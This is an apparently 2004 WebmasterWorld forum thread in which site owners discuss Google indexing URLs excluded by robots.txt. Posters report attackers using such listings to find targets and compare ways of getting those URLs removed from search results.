Welcome to WebmasterWorld Guest from 22.214.171.124
Forum Moderators: open
I've noticed that just after a number of my new sites were crawled by G, many have been hit with an attempted php hack.
My logs tell me that the hacker entered the site via urls that I was able to find in the Google index with a search for part of the query string - for example: "/email.php?page" (undoubtedly used by the hackers to identify my sites as potential targets).
I understand that these pages have not themselves been crawled, but isn't it about time G got it right and not list url's of excluded resources?
Is there anything I can do in future to stop these results from appearing in the SERPs?
[edited by: Marcia at 2:38 am (utc) on May 24, 2004]
It's comforting to realise that I'm not alone in this... Not so comforting to realise that there's no evident solution to this problem..!
On some of my sites roughly half the indexed URL's are (and have always been) explicitly excluded by robots.txt. I notice they have even been given page rank.
This problem is doing my brain in, but the solution makes sense -- in a messy kind of way...
If the only way to get URLs out of the index is to ALLOW them to be crawled, does robots.txt have any real use other than to limit the bandwith that crawlers consume?
worked fine, and removed the "url-only listings" within a day or two (based on robots.txt disallow).
Removal Technique 1 (site A)
Result: robots.txt still disallows URLs and ALL disallowed urls OUT of index.
Removal Technique 2 (site B)
Result: disallowed URLs now crawlable by G (with noindex tags) and ALL disallowed urls are still IN the index.
I'm off to use the removal tool again.......!